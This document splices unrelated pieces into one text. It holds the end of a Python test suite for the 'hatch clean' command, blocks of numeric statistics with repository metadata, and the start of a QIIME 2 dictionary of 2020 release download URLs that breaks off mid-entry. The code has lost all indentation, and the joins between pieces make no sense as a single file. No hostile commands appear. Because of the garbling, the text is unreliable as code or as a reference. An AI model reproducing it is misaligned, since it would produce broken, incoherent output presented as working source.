create_file(root_file)
assert os.path.exists(root_file)
non_root_file = os.path.join(d, 'ok', 'ko.pyc')
create_file(non_root_file)
assert os.path.exists(non_root_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
root_file,
non_root_file
)
) in result.output
assert not os.path.exists(root_file)
assert not os.path.exists(non_root_file)
assert_files_exist(files)
def test_pyd():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
root_file = os.path.join(d, 'ok.pyd')
create_file(root_file)
assert os.path.exists(root_file)
non_root_file = os.path.join(d, 'ok', 'ko.pyd')
create_file(non_root_file)
assert os.path.exists(non_root_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
root_file,
non_root_file
)
) in result.output
assert not os.path.exists(root_file)
assert not os.path.exists(non_root_file)
assert_files_exist(files)
def test_pyo():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
root_file = os.path.join(d, 'ok.pyo')
create_file(root_file)
assert os.path.exists(root_file)
non_root_file = os.path.join(d, 'ok', 'ko.pyo')
create_file(non_root_file)
assert os.path.exists(non_root_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
root_file,
non_root_file
)
) in result.output
assert not os.path.exists(root_file)
assert not os.path.exists(non_root_file)
assert_files_exist(files)
def test_verbose_already_clean():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Already clean!' in result.output
assert_files_exist(files)
| 30.505344
| 82
| 0.567889
| 2,592
| 19,981
| 4.190586
| 0.046682
| 0.078991
| 0.082858
| 0.061775
| 0.920641
| 0.904345
| 0.895323
| 0.888234
| 0.883263
| 0.874885
| 0
| 0.006547
| 0.289125
| 19,981
| 654
| 83
| 30.551988
| 0.758167
| 0
| 0
| 0.795322
| 0
| 0
| 0.095891
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 1
| 0.054581
| false
| 0
| 0.011696
| 0.001949
| 0.068226
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ec9b5eea12cbb777e5c7d083e3a01c73421c8f4
| 63,163
|
py
|
Python
|
urls/_2020.py
|
Keegan-Evans/data302
|
b4e94b8c21953ec8d71089eab9c3284ce67437ce
|
[
"BSD-3-Clause"
] | null | null | null |
urls/_2020.py
|
Keegan-Evans/data302
|
b4e94b8c21953ec8d71089eab9c3284ce67437ce
|
[
"BSD-3-Clause"
] | 10
|
2019-10-25T19:10:14.000Z
|
2021-04-28T17:19:50.000Z
|
urls/_2020.py
|
Keegan-Evans/data302
|
b4e94b8c21953ec8d71089eab9c3284ce67437ce
|
[
"BSD-3-Clause"
] | 5
|
2020-01-16T15:37:00.000Z
|
2021-04-28T17:20:35.000Z
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
# flake8: noqa
MAP_2020 = {
# 2020.2 DISTRO
'distro/core/qiime2-2020.2-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.2/release/qiime2-2020.2-py36-osx-conda.yml',
'distro/core/qiime2-2020.2-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.2/release/qiime2-2020.2-py36-linux-conda.yml',
'distro/core/2020.2':
'https://s3-us-west-2.amazonaws.com/qiime2-data/distro/core/qiime20202-1583437267.zip',
'distro/core/qiime20202-1583437267.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/distro/core/qiime20202-1583437267.zip',
# 2020.6 DISTRO
'distro/core/qiime2-2020.6-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.6/release/qiime2-2020.6-py36-osx-conda.yml',
'distro/core/qiime2-2020.6-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.6/release/qiime2-2020.6-py36-linux-conda.yml',
'distro/core/2020.6':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20206-1594241581.zip',
'distro/core/qiime20206-1594241581.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20206-1594241581.zip',
# 2020.8 DISTRO
'distro/core/qiime2-2020.8-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.8/release/qiime2-2020.8-py36-osx-conda.yml',
'distro/core/qiime2-2020.8-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.8/release/qiime2-2020.8-py36-linux-conda.yml',
'distro/core/2020.8':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20208-1598972704.zip',
'distro/core/qiime20208-1598972704.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20208-1598972704.zip',
# 2020.11 DISTRO
'distro/core/qiime2-2020.11-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.11/release/qiime2-2020.11-py36-osx-conda.yml',
'distro/core/qiime2-2020.11-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.11/release/qiime2-2020.11-py36-linux-conda.yml',
'distro/core/2020.11':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime202011-1607704676.zip',
'distro/core/qiime202011-1607704676.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime202011-1607704676.zip',
# 2020.2
'2020.2/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.2/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/gg-13-8-99-nb-classifier.qza',
'2020.2/common/silva-132-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/silva-132-99-515-806-nb-classifier.qza',
'2020.2/common/silva-132-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/silva-132-99-nb-classifier.qza',
'2020.2/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/sepp-refs-gg-13-8.qza',
'2020.2/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/sepp-refs-silva-128.qza',
'2020.2/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.2/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.2/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.2/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.2/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.2/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.2/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/chimera/atacama-table.qza',
'2020.2/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/chimera/atacama-rep-seqs.qza',
'2020.2/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/exporting/feature-table.qza',
'2020.2/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/exporting/unrooted-tree.qza',
'2020.2/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/distance-matrix.qza',
'2020.2/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/table.qza',
'2020.2/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/taxonomy.qza',
'2020.2/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/sequences.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.2/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.2/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.2/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/gneiss/sample-metadata.tsv',
'2020.2/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/gneiss/table.qza',
'2020.2/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/gneiss/taxa.qza',
'2020.2/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/aligned-sequences.fna',
'2020.2/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.2/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.2/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/feature-table-v100.biom',
'2020.2/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/feature-table-v210.biom',
'2020.2/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/pe-64-manifest',
'2020.2/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/pe-64.zip',
'2020.2/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/se-33-manifest',
'2020.2/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/se-33.zip',
'2020.2/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/sequences.fna',
'2020.2/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/unrooted-tree.tre',
'2020.2/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.2/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/ecam_shannon.qza',
'2020.2/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.2/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.2/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.2/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.2/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/faith_pd_vector.qza',
'2020.2/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/rep-seqs.qza',
'2020.2/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/taxonomy.qza',
'2020.2/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.2/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/otu-clustering/seqs.fna',
'2020.2/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/otu-clustering/85_otus.qza',
'2020.2/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/pd-mice/animal_distal_gut.qza',
'2020.2/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.2/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/pd-mice/manifest',
'2020.2/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.2/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/pd-mice/ref_tax.qza',
'2020.2/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.2/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.2/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/query-seqs.qza',
'2020.2/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/reference-seqs.qza',
'2020.2/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/query-table.qza',
'2020.2/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/read-joining/atacama-seqs.qza',
'2020.2/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/read-joining/fj-joined.zip',
'2020.2/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/sample-classifier/atacama-table.qza',
'2020.2/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.2/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.2/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.2/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.2/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/phylogeny/rep-seqs.qza',
'2020.2/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/utilities/faith-pd-vector.qza',
'2020.2/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/utilities/jaccard-pcoa.qza',
'2020.2/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.2/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/1TSFsvAo0aIHnNy-67PlAjXhhGQx6VtXCEzSmV9KeVbc/edit?usp=sharing',
'2020.2/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1TSFsvAo0aIHnNy-67PlAjXhhGQx6VtXCEzSmV9KeVbc/export?gid=0&format=tsv',
## Moving Pictures
'2020.2/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/15HpBuwlUbm6Yg12qOtKOrr2dUM7B2ityv9te7KB7Xq8/edit?usp=sharing',
'2020.2/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/15HpBuwlUbm6Yg12qOtKOrr2dUM7B2ityv9te7KB7Xq8/export?gid=0&format=tsv',
## Atacama
'2020.2/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1AFtHGlLIHy4-hwAyAL0EQUMLvZtONK5bgZ0JSInSRYc/edit?usp=sharing',
'2020.2/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1AFtHGlLIHy4-hwAyAL0EQUMLvZtONK5bgZ0JSInSRYc/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.2/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/19AZnLnTRUG4jz8ICPu4cPhNva3dipvnUXtqCSfZIiyg/edit?usp=sharing',
'2020.2/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vQ68O0P1syi1au1G4u-guxaNNAbUnvCmQYYmEKvWDGt_all3c1HPJ_2j9abEW6bI9YifZcXLlvy5joh/pub?gid=1303657428&single=true&output=tsv',
## FMT Cdiff
'2020.2/tutorials/fmt-cdiff-khanna/sample_metadata':
'https://docs.google.com/spreadsheets/d/1pR29THjgcNMMMCBwwAbfZDD5hHhjNzocBL0V7oroY2g/edit?usp=sharing',
'2020.2/tutorials/fmt-cdiff-khanna/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vQEytlplv_yNjq_d_mTA9Xw-ATgmGqodvau4moKm3q3qCwlmbvjOW9jeO3rdxi7SMEaK8-nZMeF1BSS/pub?gid=283132897&single=true&output=tsv',
## PD Mice
'2020.2/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1EIjwTSWoBjm3HAjuM0oo5VLA6whVxS6YCzVOJE2y3eU/edit?usp=sharing',
'2020.2/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vTUKT61yWMqo0xLFST1cYnIUKOvDm5YMk7i1h-MiJHU84cWkQ8ehvR3xPATMD21ZGkguNiywN98JWG5/pub?gid=1509704122&single=true&output=tsv',
# 2020.6
'2020.6/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.6/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/gg-13-8-99-nb-classifier.qza',
'2020.6/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/sepp-refs-gg-13-8.qza',
'2020.6/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/sepp-refs-silva-128.qza',
'2020.6/common/silva-138-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/silva-138-99-515-806-nb-classifier.qza',
'2020.6/common/silva-138-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/silva-138-99-nb-classifier.qza',
'2020.6/common/silva-138-99-seqs-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-seqs-515-806.qza',
'2020.6/common/silva-138-99-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-seqs.qza',
'2020.6/common/silva-138-99-tax-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-tax-515-806.qza',
'2020.6/common/silva-138-99-tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-tax.qza',
'2020.6/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.6/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.6/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.6/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.6/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.6/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.6/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/chimera/atacama-table.qza',
'2020.6/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/chimera/atacama-rep-seqs.qza',
'2020.6/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/exporting/feature-table.qza',
'2020.6/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/exporting/unrooted-tree.qza',
'2020.6/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/distance-matrix.qza',
'2020.6/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/table.qza',
'2020.6/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/taxonomy.qza',
'2020.6/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/sequences.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.6/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.6/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.6/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/gneiss/sample-metadata.tsv',
'2020.6/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/gneiss/table.qza',
'2020.6/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/gneiss/taxa.qza',
'2020.6/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/aligned-sequences.fna',
'2020.6/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.6/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.6/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/feature-table-v100.biom',
'2020.6/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/feature-table-v210.biom',
'2020.6/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz',
'2020.6/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/pe-64-manifest',
'2020.6/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/pe-64.zip',
'2020.6/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/se-33-manifest',
'2020.6/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/se-33.zip',
'2020.6/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/sequences.fna',
'2020.6/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/unrooted-tree.tre',
'2020.6/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz',
'2020.6/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz',
'2020.6/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.6/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/ecam_shannon.qza',
'2020.6/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
